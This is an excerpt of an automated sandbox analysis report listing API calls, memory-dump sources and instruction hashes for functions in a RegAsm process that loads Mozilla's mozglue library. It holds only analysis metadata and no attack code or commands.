                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2787204188-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,00427398,00000000,?,00000000,00000000), ref: 004102AE
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00427398,00000000,?,00000000,00000000), ref: 004102B5
                                                                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(00427398,?,00427398,00000000,?,00000000,00000000), ref: 004102C1
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004102ED
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1243822799-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?,?,?), ref: 004068DE
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 004069B8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                  • String ID: ik@
                                                                                                                                                                                                                                                                                                  • API String ID: 2574300362-1217583681
                                                                                                                                                                                                                                                                                                  • Opcode ID: e788d5e094678ecae44c960a4ed3759e63225d774ba99121b3081e89e8601206
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3f3496bdad06a6a9dd2fd0b74cbe6c79fbafd73ffc8673f8c463a512e0444e0e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e788d5e094678ecae44c960a4ed3759e63225d774ba99121b3081e89e8601206
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96417CB17006059BEB20CF69D8807ABF3E8AF85315F15457AD84EDB781E639EC20CB95
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C8485D3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C80CA10: malloc.MOZGLUE(?), ref: 6C80CA26
                                                                                                                                                                                                                                                                                                  • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C848725
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                                                                                                                                                                                                                                  • String ID: map/set<T> too long
                                                                                                                                                                                                                                                                                                  • API String ID: 3720097785-1285458680
                                                                                                                                                                                                                                                                                                  • Opcode ID: c615b4786a7bd9001a74d24f5336abf916d431f52e4aa10f78160fecb3a04056
                                                                                                                                                                                                                                                                                                  • Instruction ID: 99d121f31d37d4441b249fc4e98bc6687ed44deda016a42f33a3147eeb070ebf
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c615b4786a7bd9001a74d24f5336abf916d431f52e4aa10f78160fecb3a04056
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A35187746006498FC751CF18C298A5ABBF1BF4A318F18C99AD8599BB52C335EC85CFD2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 0040F8A5
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040F8F6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040F740: std::_Xinvalid_argument.LIBCPMT ref: 0040F75A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_$memcpy
                                                                                                                                                                                                                                                                                                  • String ID: string too long
                                                                                                                                                                                                                                                                                                  • API String ID: 2304785028-2556327735
                                                                                                                                                                                                                                                                                                  • Opcode ID: c255d135583dce274128fd494f2d6070698c16afa004b4f817087435439aa828
                                                                                                                                                                                                                                                                                                  • Instruction ID: e5889aef85042e50390ca67c1054f8a8dd149cfb0848e60e67da1512f7abb49f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c255d135583dce274128fd494f2d6070698c16afa004b4f817087435439aa828
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B31E6337146109BD734AE5CA8809AAF7E9EB95720720453FF441D7BC0C779AC4883A9
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C7FBDEB
                                                                                                                                                                                                                                                                                                  • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C7FBE8F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                                                  • API String ID: 2811501404-4108050209
                                                                                                                                                                                                                                                                                                  • Opcode ID: e5b7ff1c8faa6ac38313a719e4095a4e49699537b1a101dffa96fff35975d36f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2aee2c4f44d19d23d8c24850e375ff80d7a574b6adac69a4f9a4139283e6595f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5b7ff1c8faa6ac38313a719e4095a4e49699537b1a101dffa96fff35975d36f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE41A271509745CFC711DF38C5C199BB7E8AF8A348F008A2DF9A557711D730E9468B92
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 0040F536
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F890: std::exception::exception.LIBCMT ref: 0041F8A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F890: __CxxThrowException@8.LIBCMT ref: 0041F8BA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F890: std::exception::exception.LIBCMT ref: 0041F8CB
                                                                                                                                                                                                                                                                                                  • memmove.MSVCRT ref: 0040F56F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • invalid string position, xrefs: 0040F531
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                                                                                                                                                                                                                                  • String ID: invalid string position
                                                                                                                                                                                                                                                                                                  • API String ID: 1659287814-1799206989
                                                                                                                                                                                                                                                                                                  • Opcode ID: 48a4cae87a4ab2e71c5eac51e236123e1b103342487daff29e10b7d13fee6958
                                                                                                                                                                                                                                                                                                  • Instruction ID: 74e90254372bc2a628a56474e33649711b48212279b82ac7473317494fbbca9f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48a4cae87a4ab2e71c5eac51e236123e1b103342487daff29e10b7d13fee6958
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC012B31300210ABC734DD6CED8055AB3AAEBC5750B24493FE091DBF82C674EC4A83A8
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C833D19
                                                                                                                                                                                                                                                                                                  • mozalloc_abort.MOZGLUE(?), ref: 6C833D6C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _errnomozalloc_abort
                                                                                                                                                                                                                                                                                                  • String ID: d
                                                                                                                                                                                                                                                                                                  • API String ID: 3471241338-2564639436
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8b6df80922d8fc8b5b5648ae8a9718b92c46cfb70e43a7c43fbcb9865747b652
                                                                                                                                                                                                                                                                                                  • Instruction ID: d6029fc4c51c537bd092cf79f012cee555e426e1c45c40dd8b87832f1992eacb
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b6df80922d8fc8b5b5648ae8a9718b92c46cfb70e43a7c43fbcb9865747b652
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8113B31E0465897DB229F9DC9144FDB375EF86219B44B629DC4897601FB30A9C5C3D0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C856E22
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C856E3F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • MOZ_DISABLE_WALKTHESTACK, xrefs: 6C856E1D
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Init_thread_footergetenv
                                                                                                                                                                                                                                                                                                  • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                                                                                                                                                                                                                                  • API String ID: 1472356752-1153589363
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1d7b9e42db77952f365a57a0f3f681a22dd00ec1e23c81c728e50bdc4e4c331d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 61f86f98b0d57dbcac57c5e3724d7671752db124057f32f6348e1bfc3cc31fc7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d7b9e42db77952f365a57a0f3f681a22dd00ec1e23c81c728e50bdc4e4c331d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18F0F03430A2408ADA328A69CE5CA8937725B2222CF540975C40846BA1F720A926CAF2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C809EEF
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                  • String ID: Infinity$NaN
                                                                                                                                                                                                                                                                                                  • API String ID: 1385522511-4285296124
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1dee37954d23ffaa45616bae941451009af353b963a60dbec3c1f4ffec433f85
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9b9fce2d80a61312b10ba2f8c6e212f93c2505af5b3b47e6128ed9c9374a1ff1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1dee37954d23ffaa45616bae941451009af353b963a60dbec3c1f4ffec433f85
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6EF08C70605251CAEB328B5ADF4D7983B71AB2730EF210E35D5080AB40F375698ACAE2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • DisableThreadLibraryCalls.KERNEL32(?), ref: 6C80BEE3
                                                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C80BEF5
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Library$CallsDisableLoadThread
                                                                                                                                                                                                                                                                                                  • String ID: cryptbase.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 4137859361-1262567842
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C84B2C9,?,?,?,6C84B127,?,?,?,?,?,?,?,?,?,6C84AE52), ref: 6C84B628
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8490E0: free.MOZGLUE(?,00000000,?,?,6C84DEDB), ref: 6C8490FF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8490E0: free.MOZGLUE(?,00000000,?,?,6C84DEDB), ref: 6C849108
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C84B2C9,?,?,?,6C84B127,?,?,?,?,?,?,?,?,?,6C84AE52), ref: 6C84B67D
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C84B2C9,?,?,?,6C84B127,?,?,?,?,?,?,?,?,?,6C84AE52), ref: 6C84B708
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C84B127,?,?,?,?,?,?,?,?), ref: 6C84B74D
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: freemalloc
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3061335427-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C83FF2A), ref: 6C84DFFD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8490E0: free.MOZGLUE(?,00000000,?,?,6C84DEDB), ref: 6C8490FF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8490E0: free.MOZGLUE(?,00000000,?,?,6C84DEDB), ref: 6C849108
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C83FF2A), ref: 6C84E04A
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C83FF2A), ref: 6C84E0C0
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C83FF2A), ref: 6C84E0FE
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: freemalloc
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3061335427-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C846EAB
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C846EFA
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C846F1E
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C846F5C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: malloc$freememcpy
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 4259248891-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C800A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C85B5EA
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C800A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C85B623
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C800A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C85B66C
